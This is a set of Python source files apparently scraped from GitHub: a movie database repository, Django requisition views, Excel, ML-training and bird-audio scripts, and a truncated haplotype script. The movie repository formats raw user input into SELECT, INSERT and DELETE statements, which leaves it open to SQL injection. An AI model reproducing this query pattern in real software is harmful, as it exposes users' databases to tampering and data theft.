"cv2.waitKey", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "7607496227", "text": "from database_connector import db, cursor\nfrom typing import List\nfrom movie import Movie\n\n\ndef all_movies():\n cursor.execute(\"SELECT * FROM movies\")\n results = cursor.fetchall()\n movies: List[Movie] = []\n for result in results:\n movies.append(to_movie(result))\n return movies\n\n\ndef movie_id(id: int):\n cursor.execute(\"SELECT * FROM movies WHERE id = {}\".format(id))\n return to_movie(cursor.fetchone())\n\n\ndef movie_title(title: str):\n title = title.replace(\"_\", \" \")\n cursor.execute(\"SELECT * FROM movies WHERE lower(title) = '{}'\".format(title))\n return to_movie(cursor.fetchone())\n\n\ndef movies_director(director: str):\n director = director.replace(\"_\", \" \")\n cursor.execute(\"SELECT * FROM movies WHERE lower(director) = '{}'\".format(director))\n results = cursor.fetchall()\n movies: List[Movie] = []\n for result in results:\n movies.append(to_movie(result))\n return movies\n\n\ndef movies_date(date: str):\n cursor.execute(\"SELECT * FROM movies WHERE release_date = '{}'\".format(date))\n results = cursor.fetchall()\n movies: List[Movie] = []\n for result in results:\n movies.append(to_movie(result))\n return movies\n\n\ndef add_movie(movie: Movie): \n cursor.execute(\n \"INSERT INTO MOVIES (title, release_date, director) VALUES('{0}', '{1}', '{2}')\"\n .format(movie.title, movie.release_date, movie.director))\n db.commit()\n\n\ndef delete_by_id(id: int):\n cursor.execute(\n \"DELETE FROM MOVIES WHERE id = {}\"\n .format(id))\n db.commit()\n\n\ndef delete_by_title(title: str):\n title = title.replace(\"_\", \" \")\n cursor.execute(\n \"DELETE FROM MOVIES WHERE lower(title) = '{}'\"\n .format(title))\n db.commit()\n\n\ndef delete_by_director(director: str):\n director = director.replace(\"_\", \" \")\n cursor.execute(\n \"DELETE FROM MOVIES WHERE lower(director) = '{}'\"\n .format(director))\n db.commit()\n\ndef delete_by_date(date: str):\n cursor.execute(\n \"DELETE FROM MOVIES WHERE release_date = '{}'\"\n .format(date))\n db.commit()\n\n\ndef to_movie(result):\n print(result)\n return Movie(\n id = result[0],\n title = result[1],\n release_date = result[2],\n director = result[3]\n )", "repo_name": "12wet/python", "sub_path": "Project/repository.py", "file_name": "repository.py", "file_ext": "py", "file_size_in_byte": 2260, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "database_connector.cursor.execute", "line_number": 7, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 7, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchall", "line_number": 8, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 9, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 9, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 16, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 16, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchone", "line_number": 17, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 17, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 22, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 22, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchone", "line_number": 23, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 23, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 28, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 28, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchall", "line_number": 29, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 30, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 37, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 37, "usage_type": "name"}, {"api_name": "database_connector.cursor.fetchall", "line_number": 38, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 39, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 39, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 45, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 46, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 46, "usage_type": "name"}, {"api_name": "movie.title", "line_number": 48, "usage_type": "attribute"}, {"api_name": "movie.release_date", "line_number": 48, "usage_type": "attribute"}, {"api_name": "movie.director", "line_number": 48, "usage_type": "attribute"}, {"api_name": "database_connector.db.commit", "line_number": 49, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 49, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 53, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 53, "usage_type": "name"}, {"api_name": "database_connector.db.commit", "line_number": 56, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 56, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 61, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 61, "usage_type": "name"}, {"api_name": "database_connector.db.commit", "line_number": 64, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 64, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 69, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 69, "usage_type": "name"}, {"api_name": "database_connector.db.commit", "line_number": 72, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 72, "usage_type": "name"}, {"api_name": "database_connector.cursor.execute", "line_number": 75, "usage_type": "call"}, {"api_name": "database_connector.cursor", "line_number": 75, "usage_type": "name"}, {"api_name": "database_connector.db.commit", "line_number": 78, "usage_type": "call"}, {"api_name": "database_connector.db", "line_number": 78, "usage_type": "name"}, {"api_name": "movie.Movie", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "74155606886", "text": "from django.shortcuts import render, get_object_or_404, redirect, HttpResponseRedirect\nfrom django.contrib import messages\nfrom .models import Requisition\nfrom employee.models import Employee\nfrom .forms import RequisitionCreate\nfrom datetime import datetime\n\n# Create your views here.\ndef index(request):\n requisitions = Requisition.objects.all()\n context = {\n 'requisitions': requisitions,\n }\n return render(request, 'requisition/index.html', context)\n\ndef add(request):\n newRequisition = RequisitionCreate()\n if request.method == 'POST':\n if request.POST['due_date'] == '':\n context = {\n \"newRequisition\" : RequisitionCreate(request.POST)\n }\n \n messages.error(request, 'Due Date cannot be empty')\n return render(request, 'requisition/add.html', context)\n\n try:\n due_date = datetime.strptime(request.POST['due_date'], '%b %d, %Y')\n except:\n due_date = datetime.strptime(request.POST['due_date'], '%B %d, %Y')\n \n modifiedPost = request.POST.copy()\n modifiedPost['due_date'] = due_date\n\n newRequisition = RequisitionCreate(modifiedPost, request.FILES)\n next = request.POST.get('next', '/')\n if newRequisition.is_valid():\n newRequisition.save()\n messages.success(request, 'Requisition data saved, pending further action.') \n return HttpResponseRedirect(next)\n else:\n context = {\n \"newRequisition\" : newRequisition\n }\n \n messages.error(request, 'Invalid form data. Please check form data')\n return render(request, 'requisition/add.html', context)\n\n context = {\n \"newRequisition\" : newRequisition\n }\n return render(request, 'requisition/add.html', context)\n\ndef show(request, requisition_id):\n requisition = get_object_or_404(Requisition, pk=requisition_id)\n context = {\n 'requisition': requisition\n }\n return render(request, 'requisition/show.html', context)\n\ndef edit(request, requisition_id): \n # requisition = get_object_or_404(Requisition, pk=int(requisition_id))\n # messages.error(request, 'Invalid request. Data not found')\n # update_form = RequisitionCreate(request.POST or None, instance = requisition)\n\n # if update_form.is_valid():\n # update_form.save()\n # messages.success(request, 'Requisition data updated')\n # return redirect('requisitoin/show', {'requisition': requisition})\n\n # context = {'upload_form':update_form}\n # return render(request, 'requisition/edit.html', context)\n\n\n requisition = get_object_or_404(Requisition, pk=int(requisition_id)) \n if request.method == 'POST':\n next = request.POST.get('next', '/')\n \n # Get form values\n if(request.POST['item'] == '' or request.POST['quantity'] == '' or request.POST['unit'] == '' or request.POST['due_date'] == '' or request.POST.get('status') == '' or request.POST.get('originator') == '' or request.POST.get('authorizer') == '' or request.POST.get('approver') == ''):\n print(request.POST)\n messages.error(request, 'Invalid form data. Please check form data. All feilds are compulsory')\n return HttpResponseRedirect(next)\n \n try:\n requisition.item = request.POST['item']\n requisition.quantity = request.POST['quantity']\n requisition.unit = request.POST['unit']\n requisition.description = request.POST['description']\n try:\n requisition.due_date = datetime.strptime(request.POST['due_date'], '%b %d, %Y')\n except:\n requisition.due_date = datetime.strptime(request.POST['due_date'], '%B %d, %Y')\n requisition.status = request.POST.get('status')\n requisition.originator = Employee.objects.get(id = int(request.POST.get('originator')))\n requisition.authorizer = Employee.objects.get(id = int(request.POST.get('authorizer')))\n requisition.approver = Employee.objects.get(id = int(request.POST.get('approver')))\n \n except:\n print(requisition)\n messages.error(request, 'Invalid form data. Please check form data')\n return HttpResponseRedirect(next)\n if requisition:\n try:\n requisition.save()\n messages.success(request, 'Requisition updated') \n return HttpResponseRedirect(next)\n except:\n messages.error(request, 'Invalid form data. Please check form data') \n return HttpResponseRedirect(next)\n else:\n status = Requisition._meta.get_field('status').choices\n employee = Employee.objects.all()\n request_status = dict(status)\n context = {\n 'requisition': requisition,\n 'status': request_status,\n 'employee': employee,\n }\n return render(request, 'requisition/edit.html', context)\n\ndef delete(request, requisition_id):\n next = request.POST.get('next', '/') \n requisition_id = int(requisition_id)\n try:\n requisition = Requisition.objects.get(id = requisition_id)\n except requisition.DoesNotExist:\n messages.error(request, 'Invalid requisition data') \n return HttpResponseRedirect(next)\n\n if requisition.delete():\n requisitions = Requisition.objects.all()\n context = {\n 'requisitions': requisitions,\n }\n messages.success(request, 'Requisition data deleted') \n return render(request, 'requisition/index.html', context)\n else:\n messages.error(request, 'Unable to delete this request') \n return HttpResponseRedirect(next)", "repo_name": "emmadeyi/material_inventory", "sub_path": "material_inventory/requisition/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.Requisition.objects.all", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Requisition.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "models.Requisition", "line_number": 10, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "forms.RequisitionCreate", "line_number": 17, "usage_type": "call"}, {"api_name": "forms.RequisitionCreate", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "forms.RequisitionCreate", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 39, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 39, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 46, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 46, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 55, "usage_type": "call"}, {"api_name": "models.Requisition", "line_number": 55, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 75, "usage_type": "call"}, {"api_name": "models.Requisition", "line_number": 75, "usage_type": "argument"}, {"api_name": "django.contrib.messages.error", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 91, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 93, "usage_type": "name"}, {"api_name": "employee.models.Employee.objects.get", "line_number": 95, "usage_type": "call"}, {"api_name": "employee.models.Employee.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "employee.models.Employee", "line_number": 95, "usage_type": "name"}, {"api_name": "employee.models.Employee.objects.get", "line_number": 96, "usage_type": "call"}, {"api_name": "employee.models.Employee.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "employee.models.Employee", "line_number": 96, "usage_type": "name"}, {"api_name": "employee.models.Employee.objects.get", "line_number": 97, "usage_type": "call"}, {"api_name": "employee.models.Employee.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "employee.models.Employee", "line_number": 97, "usage_type": "name"}, {"api_name": "django.contrib.messages.error", "line_number": 101, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 101, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 102, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 106, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 106, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 107, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 109, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 109, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 110, "usage_type": "call"}, {"api_name": "models.Requisition._meta.get_field", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Requisition._meta", "line_number": 112, "usage_type": "attribute"}, {"api_name": "models.Requisition", "line_number": 112, "usage_type": "name"}, {"api_name": "employee.models", "line_number": 113, "usage_type": "name"}, {"api_name": "employee.models.Employee.objects.all", "line_number": 113, "usage_type": "call"}, {"api_name": "employee.models.Employee.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "employee.models.Employee", "line_number": 113, "usage_type": "name"}, {"api_name": "employee.models", "line_number": 118, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Requisition.objects.get", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Requisition.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Requisition", "line_number": 126, "usage_type": "name"}, {"api_name": "django.contrib.messages.error", "line_number": 128, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 128, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Requisition.objects.all", "line_number": 132, "usage_type": "call"}, {"api_name": "models.Requisition.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.Requisition", "line_number": 132, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 136, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 136, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 139, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 139, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponseRedirect", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "16789493719", "text": "import xlrd\nimport xlwt\n\ndef compare(excel1,excel2,K):\n data1=xlrd.open_workbook(excel1) #open file\n sh1 = data1.sheets()[0]\n nrows = sh1.nrows\n dict1_d2d={}\n for i in range(nrows):\n row_data=sh1.row_values(i)\n temp = row_data[0]\n dict1_d2d[row_data[0]]=row_data[1] # only two col\n\n data2 = xlrd.open_workbook(excel2) # open file\n sh2 = data2.sheets()[0]\n nrows = sh2.nrows\n dict2_d2d = {}\n for i in range(1,nrows):\n row_data = sh2.row_values(i)\n temp2=row_data[0]\n dict2_d2d[row_data[0]] = row_data[1] # only two col\n\n key='%s Pk %s'%(excel1_name[K],excel2_name[K])\n file = xlwt.Workbook(encoding='utf-8')\n table = file.add_sheet('%s'% (key))\n list_date = []\n for days in dict1_d2d:\n list_date.append(days)\n list_date = sorted(list_date) # the result of sorted is another ,must reagine\n cow = 0\n for i in range(len(list_date)):\n Date = list_date[i]\n table.write(cow, 0, str(Date))\n table.write(cow, 1, dict1_d2d[Date])\n if Date in dict2_d2d:\n table.write(cow,2,dict2_d2d[Date])\n cow = cow + 1\n file.save('%s.xls' % (key))\n\nif __name__ == \"__main__\":\n excel1_name=['ltsz','zsz','jtsy_rate']\n excel2_name=['ltsz_DC','zsz_DC','jtsy_rate_DC']\n for i in range(len(excel1_name)):\n name1='%s.xls'%(excel1_name[i])\n name2='%s.xls'%(excel2_name[i])\n compare(name1,name2,i)\n", "repo_name": "xiaoxiaojiangshang/Programs", "sub_path": "python/工作/2017-8-6/Deal_exce.py", "file_name": "Deal_exce.py", "file_ext": "py", "file_size_in_byte": 1454, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xlrd.open_workbook", "line_number": 5, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 14, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "7278261660", "text": "import torch\nimport torch.nn.functional as F\nfrom tqdm import tqdm\n\nfrom .neural_based_task import NeuralBaseTask\n\nfrom brokorli.metrics import calculate_sc_score\n\nclass SM(NeuralBaseTask):\n\n def __init__(self, task_config):\n super().__init__(config=task_config)\n \n def train(self):\n max_score = 0\n \n for epoch in range(int(self.config.epochs)):\n self.model.train()\n \n train_losses = []\n avg_train_loss = 0\n \n progress_bar = tqdm(self.train_data_loader)\n for data in progress_bar:\n progress_bar.set_description(f\"[Training] Epoch : {epoch}, Avg Loss : {avg_train_loss:.4f}\")\n \n input_ids, token_type_ids, attention_mask, label_ids = data\n \n self.optimizer.zero_grad()\n \n outputs = self.model(\n input_ids=input_ids, \n token_type_ids=token_type_ids,\n attention_mask=attention_mask,\n labels=label_ids,\n )\n \n loss = outputs[\"loss\"]\n \n self.accelerator.backward(loss)\n self.optimizer.step()\n \n train_losses.append(loss.item())\n \n avg_train_loss = sum(train_losses) / len(train_losses)\n \n avg_valid_loss, avg_valid_f1_score, avg_valid_acc_score = self.valid()\n \n print(f\"Epoch : {epoch}\\tTrain Loss : {avg_train_loss:.4f}\\tValid Loss : {avg_valid_loss:.4f}\\tValid F1 Score : {avg_valid_f1_score * 100:.4f}\\tAcc Score : {avg_valid_acc_score * 100:.4f}\")\n \n if max_score < avg_valid_f1_score:\n self.update_trained_model(self.MODEL_PATH.format(epoch, avg_valid_f1_score * 100))\n max_score = avg_valid_f1_score\n \n def valid(self):\n self.model.eval()\n \n with torch.no_grad():\n valid_losses, valid_f1_scores, valid_acc_scores = [], [], []\n avg_valid_loss, avg_valid_f1_score, avg_valid_acc_score = 0, 0, 0\n \n progress_bar = tqdm(self.config.test_data_loader)\n for data in progress_bar:\n progress_bar.set_description(f\"[Validation] Avg Loss : {avg_valid_loss:.4f} Avg Score : {avg_valid_f1_score * 100:.4f}\")\n \n input_ids, token_type_ids, attention_mask, label_ids = data\n \n input_ids, token_type_ids, attention_mask, label_ids = (\n input_ids.to(self.device),\n token_type_ids.to(self.device),\n attention_mask.to(self.device),\n label_ids.to(self.device)\n )\n \n outputs = self.model(\n input_ids=input_ids, \n token_type_ids=token_type_ids,\n attention_mask=attention_mask,\n labels=label_ids,\n )\n \n loss = outputs[\"loss\"]\n logits = outputs[\"logits\"] \n \n valid_losses.append(loss.item())\n \n pred_tags = torch.argmax(logits, dim=-1)\n score = calculate_sc_score(true_y=label_ids.float().tolist(), pred_y=pred_tags.tolist())\n \n \n valid_f1_scores.append(score[\"f1\"])\n valid_acc_scores.append(score[\"accuracy\"])\n \n avg_valid_loss = sum(valid_losses) / len(valid_losses) \n avg_valid_f1_score = sum(valid_f1_scores) / len(valid_f1_scores) \n avg_valid_acc_score = sum(valid_acc_scores) / len(valid_acc_scores) \n \n return avg_valid_loss, avg_valid_f1_score, avg_valid_acc_score\n \n def predict(self, **parameters):\n \n if \"sentence\" not in parameters.keys() or \"question\" not in parameters.keys():\n raise KeyError(\"The machine reading comprehension task must need sentence and question parameters\")\n \n # TODO : sentence length = 1 and question length > 1 \n sentence = parameters[\"sentence\"]\n question = parameters[\"question\"]\n \n with torch.no_grad():\n if type(question) == str:\n question = [question]\n\n if type(sentence) == str:\n sentence = [sentence] * len(question)\n \n tokenized = self.tokenizer(question, sentence, padding=\"max_length\", max_length=self.config.max_seq_len, truncation=True, return_tensors=\"pt\")\n outputs = self.model(\n input_ids=tokenized[\"input_ids\"].to(self.device), \n token_type_ids=tokenized[\"token_type_ids\"].to(self.device),\n attention_mask=tokenized[\"attention_mask\"].to(self.device),\n labels=None,\n )\n \n logits = F.softmax(outputs[\"logits\"], dim=-1)\n \n pred_label = torch.argmax(logits, dim=-1).tolist()\n scores = logits.tolist()\n \n return [{\"confidence_score\": scores[idx][label], \"label\": self.i2l[label]} for idx, label in enumerate(pred_label)]\n ", "repo_name": "chnaaam/brokorli", "sub_path": "brokorli/tasks/semantic_matching_classification.py", "file_name": "semantic_matching_classification.py", "file_ext": "py", "file_size_in_byte": 5390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "neural_based_task.NeuralBaseTask", "line_number": 9, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 58, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 87, "usage_type": "call"}, {"api_name": "brokorli.metrics.calculate_sc_score", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.argmax", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "9227075194", "text": "import os\nimport sqlite3\nimport urllib.request\nimport os\nfrom multiprocessing.pool import ThreadPool\nimport librosa\nimport matplotlib.pyplot as plt\nimport pickle\nimport pandas as pd\n\nRECORDINGS_DIR = 'storage/recordings/'\nPICKLES_DIR = 'storage/pickles/'\nDATABASE_DIR = 'storage/db.sqlite'\n\ntop_100_csv = pd.read_csv('app/model/top100_img_codes.csv', names=['id1', 'id2', 'species'])\ntop_100_genus_species = top_100_csv.species.tolist()\ntop_100_species = [x.split('_')[1] for x in top_100_genus_species]\n\nconn = sqlite3.connect(DATABASE_DIR)\nc = conn.cursor()\n\nquery = '''SELECT r.id, r.file\n FROM taxonomy AS t\n JOIN recordings AS r ON t.id = r.taxonomy_id\n WHERE t.german = 1.0 AND r.scraped_duration > 100 AND t.species in '''\n\nall_recordings = c.execute(query + str(tuple(top_100_species))).fetchall()\nprint('all recordings: ', len(all_recordings))\nalready_sliced = [int(x.split('_')[0]) for x in os.listdir(PICKLES_DIR)]\nprint('already sliced: ', len(already_sliced))\nrecordings = [x for x in all_recordings if x[0] not in already_sliced]\nprint('recordings: ', len(recordings))\n\nimport sys\nsys.exit()\n\ndef download_and_slice(input_tuple):\n rec_id, download_path = input_tuple\n try:\n file_path = RECORDINGS_DIR + str(rec_id) + \".mp3\"\n resp = urllib.request.urlretrieve(\"http:\" + download_path, file_path)\n assert resp[1]['Content-Type'] == 'audio/mpeg', f'file {rec_id} not available'\n print(f'file {rec_id} downloaded')\n audio, sr = librosa.load(file_path)\n\n audio_abs = [abs(x) for x in audio]\n signal_per_second = [sum(audio_abs[i: i + 22050]) for i in range(0, audio.shape[0], 22050)]\n\n maxdensity, i_start = 0, 0\n for i in range(len(signal_per_second) - 5):\n density = sum(signal_per_second[i:i + 5])\n if density > maxdensity:\n maxdensity = density\n i_start = i\n print(i_start)\n\n slice_maxwindow = signal_per_second[i_start: i_start + 5]\n\n slice_signal = audio[i_start * 22050 : (i_start + 5) * 22050]\n \n spect_slice = librosa.feature.melspectrogram(\n slice_signal, sr=22050, n_fft=2048, hop_length=512, n_mels=256, fmin=0, fmax=12000)\n pickle_path = os.path.join(PICKLES_DIR, str(rec_id) + '_0.pkl')\n with open(pickle_path, 'wb+') as f:\n pickle.dump(spect_slice, f)\n os.remove(file_path)\n except urllib.error.HTTPError:\n print(f'file {rec_id} not found, HTTPError')\n pass\n\npool = ThreadPool(4)\npool.map(download_and_slice, recordings)", "repo_name": "multavici/DSR-Bird-Song", "sub_path": "birdsong/data_management/utils/create_extra_slices.py", "file_name": "create_extra_slices.py", "file_ext": "py", "file_size_in_byte": 2569, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 19, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 35, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 41, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 41, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 41, "usage_type": "name"}, {"api_name": "librosa.load", "line_number": 44, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 61, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 65, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 66, "usage_type": "call"}, {"api_name": "urllib.request.error", "line_number": 67, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 67, "usage_type": "name"}, {"api_name": "multiprocessing.pool.ThreadPool", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "7219751465", "text": "#!/usr/bin/env python\n# coding=utf-8\n# __author__ = 'Yunchao Ling'\n\n\n# import pandas as pd\n# import numpy as np\nimport os\nimport re\nimport click\nimport time\nimport multiprocessing\nfrom Bio import SeqIO\nfrom tqdm import tqdm, trange\nimport parham\n\n\nvalid_nuc = set([\"A\", \"C\", \"G\", \"T\"])\npos_freq = {}\npos_ref = {}\n\n\ndef hamming(seq1: str, seq2: str, poss_freq: dict):\n seq1 = seq1.upper()\n seq2 = seq2.upper()\n distance = 0\n max_maf = 0\n diff = []\n for i in range(len(seq1)):\n if seq1[i] in valid_nuc and seq2[i] in valid_nuc:\n if seq1[i] != seq2[i]:\n distance += 1\n diff.append(str(i))\n if poss_freq[i] > max_maf:\n max_maf = poss_freq[i]\n else:\n if seq1[i] != seq2[i]:\n diff.append(str(i))\n # if poss_freq[i] > max_maf:\n # max_maf = poss_freq[i]\n # if seq1[i] != seq2[i]:\n # distance += 1\n # diff.append(str(i))\n # if poss_freq[i] > max_maf:\n # max_maf = poss_freq[i]\n if distance == 0:\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n # diff.append(str(i))\n if poss_freq[i] > max_maf:\n max_maf = poss_freq[i]\n # diff.sort(key=lambda x: x[0])\n # diff = [\"%d:%s:%s\" % (item[0], item[1], item[2]) for item in diff]\n # diff = \"|\".join(diff)\n return distance, max_maf, diff\n\n\ndef init_freq(in_file: str):\n global pos_freq\n global pos_ref\n\n count = 0\n with open(in_file, \"r\") as infile:\n infile.readline()\n for line in infile:\n splitline = line.rstrip().split(\"\\t\")\n pos_ref[count] = int(splitline[0])\n pos_freq[count] = float(splitline[2])\n count += 1\n\n\ndef find_clade(clades: dict, node: int):\n for key in clades:\n if node in clades[key]:\n return key\n\n\ndef seq2geno(seq: str, seqindex: list):\n geno_list = []\n for item in seqindex:\n geno_list.append(\"%d:%s\" % (item[1], seq[item[0]]))\n genos = \"|\".join(geno_list)\n return genos\n\n\ndef exec_queue(iter: int, seqss: list, poss_freq: dict, out_file: str):\n outfile = open(out_file, \"a+\")\n myid = int(multiprocessing.current_process().name.split(\"-\")[1])\n # for i in tqdm(range(len(seqss)), desc=str(iter)):\n for i in range(len(seqss)):\n if iter < i:\n distance, max_maf, diff = hamming(seqss[iter], seqss[i], poss_freq)\n outfile.write(\"%d\\t%d\\t%d\\t%f\\t%s\\n\" % (iter, i, distance, max_maf, \",\".join(diff)))\n outfile.flush()\n outfile.close()\n\n\n@click.command()\n@click.argument(\"in_dir\", type=click.Path(exists=True))\ndef batch_haplotype_network(in_dir: str):\n '''\n 批量生成单倍型,并且按照all生成单倍型网络\n 输入目录包括pi_pos FASTA文件,freq文件\n 输出在同一目录,包括node文件,和net文件\n 对所有频率阈值生成node文件,仅对无过滤的all生成net文件\n '''\n '''\n Generate haplotypes in batches, and generate haplotypes according to all. \n The network input directory includes pi_pos FASTA files, \n and the freq files are output in the same directory, including node files, and net files. \n Generate node files for all frequency thresholds, only for all without filtering net file \n '''\n for infile in os.listdir(in_dir):\n if infile.startswith(\"pi_pos\"):\n # print(\"正在计算文件%s\" % infile)\n print(\"Calculating file %s\" % infile)\n pi_pos_file = 